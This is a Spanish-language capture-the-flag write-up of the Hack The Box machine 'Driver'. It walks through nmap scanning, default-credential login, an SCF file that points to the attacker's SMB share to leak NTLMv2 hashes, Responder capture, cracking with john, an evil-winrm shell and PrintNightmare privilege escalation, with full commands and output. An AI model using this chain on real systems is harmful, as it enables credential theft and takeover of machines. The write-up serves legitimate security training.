Máquina Driver Hack the Box
Lo primero que realizamos es una enumeración de todos los servicios para ver a que nos estamos enfrentando
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Driver]
└──╼ #nmap -sCV -p80,135,445,5985 -oN nmap 10.10.11.106
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-12 21:31 -05
Nmap scan report for 10.10.11.106
Host is up (0.083s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-02-13T09:31:43
|_ start_date: 2022-02-13T05:22:42
|_clock-skew: mean: 7h00m12s, deviation: 0s, median: 7h00m12s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.56 seconds
Primero vamos a revisar el servicio web y nos encontramos con un login
Intentamos con contraseñas por defecto y nos encontramos que podemos ingresar con admin:admin
Dentro de firmware updates vemos un mensaje que nos dice que seleccionemos el modelo y que subamos la actualización, además nos dice que la revisión se realizará de forma manual
Investigando un poco nos encontramos con esté articúlo que nos dice que podemos subir un archivo SCF para tratar de optener el hashs, vamos a segir el tutorial para realizar el ataque, tambien vemos que el samba no está firmado, así que podemos pensar en este ataque
┌─[root@angussmoody]─[/mnt/angussMoody]
└──╼ #crackmapexec smb 10.10.11.106
SMB 10.10.11.106 445 DRIVER [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True)
Lo primero que vamos a hacer es crearnos el archivo como nos dice el articulo
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Driver]
└──╼ #cat @test.scf
───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: @test.scf
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ [Shell]
2 │ Command=2
3 │ IconFile=\\10.10.14.5\share\angussMoody.ico
4 │ [Taskbar]
5 │ Command=ToggleDesktop
───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
A continuación envenenamos la red con la herramienta Responder, como nos dice el articulo
┌─[root@angussmoody]─[/mnt/angussMoody]
└──╼ #responder -I tun0 -wrf --lm
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [ON]
Fingerprint hosts [ON]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.5]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-P0X1BIGMKOZ]
Responder Domain Name [8Y7X.LOCAL]
Responder DCE-RPC Port [45423]
[+] Listening for events...
y ahora vamos a subir nuestro archivo y esperamos un rato
Modifiqué el responder para sin la bandera del —lm y tenemos un hash de un usuario llamado Tony
┌─[root@angussmoody]─[/mnt/angussMoody]
└──╼ #responder -I tun0 -wrf
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [ON]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.5]
Challenge set [1122334455667788]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-N2IKUGSOIHK]
Responder Domain Name [JVZS.LOCAL]
Responder DCE-RPC Port [48420]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:1122334455667788:854E9F98B2E1E143FAF94EF13B8BADA2:0101000000000000809F7F1F5B20D801C528F3176919B2C100000000020008004A0056005A00530001001E00570049004E002D004E00320049004B005500470053004F00490048004B0004003400570049004E002D004E00320049004B005500470053004F00490048004B002E004A0056005A0053002E004C004F00430041004C00030014004A0056005A0053002E004C004F00430041004C00050014004A0056005A0053002E004C004F00430041004C0007000800809F7F1F5B20D80106000400020000000800300030000000000000000000000000200000FFA23774D820DD6A78BDFEF0CEF0905D8447B3D670E0C426C39B607D7293E2A60A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003500000000000000000000000000
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
[*] Skipping previously captured hash for DRIVER\tony
Ahora pasamos este hash a un archivo para tratar de romperlo con el diccionario rockyou
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Driver]
└──╼ #cat hash
───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: hash
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ tony::DRIVER:1122334455667788:854E9F98B2E1E143FAF94EF13B8BADA2:0101000000000000809F7F1F5B20D801C528F3176919B2C100000000020008004A0056005A0053000100
│ 1E00570049004E002D004E00320049004B005500470053004F00490048004B0004003400570049004E002D004E00320049004B005500470053004F00490048004B002E004A0056005A0
│ 053002E004C004F00430041004C00030014004A0056005A0053002E004C004F00430041004C00050014004A0056005A0053002E004C004F00430041004C0007000800809F7F1F5B20D8
│ 0106000400020000000800300030000000000000000000000000200000FFA23774D820DD6A78BDFEF0CEF0905D8447B3D670E0C426C39B607D7293E2A60A00100000000000000000000
│ 00000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E003500000000000000000000000000
───────┴────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
Ahora vamos a utilizar la herramienta john para tratar de crackear este hash
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Driver]
└──╼ #john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony (tony)
1g 0:00:00:00 DONE (2022-02-12 21:57) 33.33g/s 1126Kp/s 1126Kc/s 1126KC/s !!!!!!..redlips
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
ya con esto tenemos credenciales del usuario tony, como tenemos el puerto 5985 de winrm habilitado, podemos probar estas credenciales con crackmapexec para ver si si corresponden a este usuario y vemos que nos pone pwn3d!, así que realizar una conexión con evil-winrm
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Driver]
└──╼ #crackmapexec winrm 10.10.11.106 -u 'tony' -p 'liltony'
WINRM 10.10.11.106 5985 NONE [*] None (name:10.10.11.106) (domain:None)
WINRM 10.10.11.106 5985 NONE [*] http://10.10.11.106:5985/wsman
WINRM 10.10.11.106 5985 NONE [+] None\tony:liltony (Pwn3d!)
Ejecutamos la herramienta con las las credenciales que tenemos y vemos que tenemos acceso como el usuario tony
┌─[root@angussmoody]─[/mnt/angussMoody/Machines/Driver]
└──╼ #evil-winrm -i 10.10.11.106 -u 'tony' -p 'liltony'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\tony\Desktop> dir
Directory: C:\Users\tony\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/12/2022 9:23 PM 34 user.txt
*Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt
fcf0908a9003e03eb687754c1db8d492
Ahora para la escalada de Privilegios, vamos a realizar una enumeración y entre lo que vemos, vemos que hay un proceso spoolsv que es vulnerable
*Evil-WinRM* PS C:\Users\tony\Documents> ps
Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName
------- ------ ----- ----- ----- ------ -- -----------
700 32 8684 24112 ...97 0.95 4952 backgroundTaskHost
40 4 1756 2200 ...67 0.05 2596 cmd
113 10 10436 10276 ...45 0.27 2928 conhost
306 14 1200 4136 ...03 344 csrss
270 18 1284 4228 ...09 452 csrss
252 18 3384 12188 ...44 2140 dllhost
230 15 3672 12120 ...09 2348 dllhost
333 25 29356 47576 ...98 836 dwm
518 35 10284 35336 ...44 0.22 2480 explorer
1422 63 18408 60812 ...79 2.66 3144 explorer
508 27 8336 30680 ...32 0.36 4296 explorer
472 26 8496 30632 ...30 0.38 4624 explorer
0 0 0 4 0 0 Idle
980 23 4736 13960 ...00 588 lsass
186 14 2440 8832 ...97 2472 msdtc
498 40 15672 43124 304 1.92 5036 OneDrive
55 6 720 3328 ...65 0.00 4164 PING
284 17 6824 22008 ...76 1.03 3200 RuntimeBroker
650 37 14692 15844 ...94 2716 SearchIndexer
755 48 30204 71704 33078 0.63 3572 SearchUI
347 17 3528 12964 ...37 2664 sedsvc
292 12 2984 6480 ...77 572 services
510 27 12056 44160 233 0.52 3488 ShellExperienceHost
380 18 3800 18592 ...56 1.19 2424 sihost
49 3 404 1192 ...57 268 smss
399 24 5644 13944 ...14 1208 spoolsv
200 10 2752 12932 ...00 4336 sppsvc
573 22 5256 16936 ...22 664 svchost
574 18 3412 8792 ...92 704 svchost
1735 91 32252 53252 ...76 812 svchost
231 18 2224 8424 ...00 888 svchost
578 28 15660 22100 ...40 896 svchost
430 22 4976 17660 ...49 960 svchost
820 29 6388 14364 ...46 988 svchost
690 49 8048 19948 ...35 1036 svchost
123 9 1548 6380 ...95 1316 svchost
499 43 11224 21364 ...66 1340 svchost
267 18 4800 14100 ...08 1516 svchost
134 11 3116 9276 ...98 1528 svchost
205 25 4288 15596 ...66 1612 svchost
170 14 3404 9560 ...04 1632 svchost
120 9 1376 6120 ...79 2816 svchost
83 6 924 4756 ...84 4576 svchost
182 14 2324 12308 ...31 0.00 5004 svchost
875 0 128 140 3 4 System
125 9 1304 6020 ...82 1784 taskeng
275 27 4380 12928 ...16 0.14 2628 taskhostw
138 12 2756 10416 ...24 1644 VGAuthService
113 8 1428 5552 ...09 1624 vm3dservice
101 9 1468 6052 ...30 2044 vm3dservice
339 23 8772 20872 ...52 1728 vmtoolsd
213 19 4976 15036 ...68 0.67 4996 vmtoolsd
138 11 1608 7764 ...93 3064 VSSVC
98 9 1060 4724 ...74 472 wininit
187 9 1976 8820 ...23 500 winlogon
162 13 1840 8672 ...89 4904 WmiApSrv
221 16 5352 13092 ...98 2336 WmiPrvSE
388 25 27696 37208 ...77 4748 WmiPrvSE
655 33 83760 102444 ...73 1.53 976 wsmprovhost
224 11 1668 7180 ...94 684 WUDFHost
Nos encontramos con este articulo de github donde nos dice que podemos escalar privilegios, así que vamos a subir este exploit para ver si nos sirve para la escalada de privilegios
Vamos a subir este exploit para tratar de correrlo y realizar el proceso como nos dice este articulo, vamos a la ruta C:\Windows\temp y nos creamos un directorio para subir nuestro exploit
*Evil-WinRM* PS C:\Users\tony\Documents> cd c:\Windows\temp
*Evil-WinRM* PS C:\Windows\temp> mkdir test
Directory: C:\Windows\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/13/2022 2:59 AM test
*Evil-WinRM* PS C:\Windows\temp> cd test
*Evil-WinRM* PS C:\Windows\temp\test> upload /mnt/angussMoody/Scripts/Windows/CVE-2021-1675.ps1
Info: Uploading /mnt/angussMoody/Scripts/Windows/CVE-2021-1675.ps1 to C:\Windows\temp\test\CVE-2021-1675.ps1
Data: 238080 bytes of 238080 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Windows\temp\test> dir
Directory: C:\Windows\temp\test
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/13/2022 2:59 AM 178561 CVE-2021-1675.ps1
Al tratar de ejecutar el ps1 nos genera un error
Evil-WinRM* PS C:\Windows\temp\test> Import-Module .\cve-2021-1675.ps1
File C:\Windows\temp\test\cve-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ Import-Module .\cve-2021-1675.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
Buscando nos escontramos con este articulo que nos dice cómo podemos quitar esa restrición
Quitamos la restricción y ejecutamos nuestro exploit como nos dice el github
*Evil-WinRM* PS C:\Windows\temp\test> Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
*Evil-WinRM* PS C:\Windows\temp\test> Import-Module .\cve-2021-1675.ps1
*Evil-WinRM* PS C:\Windows\temp\test> Invoke-Nightmare -DriverName "Xerox" -NewUser "angussmoody" -NewPassword "angussmoody123*"
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user angussmoody as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
Vamos a ver el usuario que creamos y nos dice que estamos dentro del grupo administrador
*Evil-WinRM* PS C:\Windows\temp\test> net user angussmoody
User name angussmoody
Full Name angussmoody
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/13/2022 3:09:19 AM
Password expires Never
Password changeable 2/13/2022 3:09:19 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
Ahora vamos a tratar de conectarnos con nuestro usuario y ya podemos ingresar y ver la flag de administrador
┌─[root@angussmoody]─[/mnt/angussMoody/Scripts/Windows]
└──╼ #evil-winrm -i 10.10.11.106 -u 'angussmoody' -p 'angussmoody123*'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\angussmoody\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/13/2022 2:43 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
fb8039f96aee529e5022ca87fb4b843d
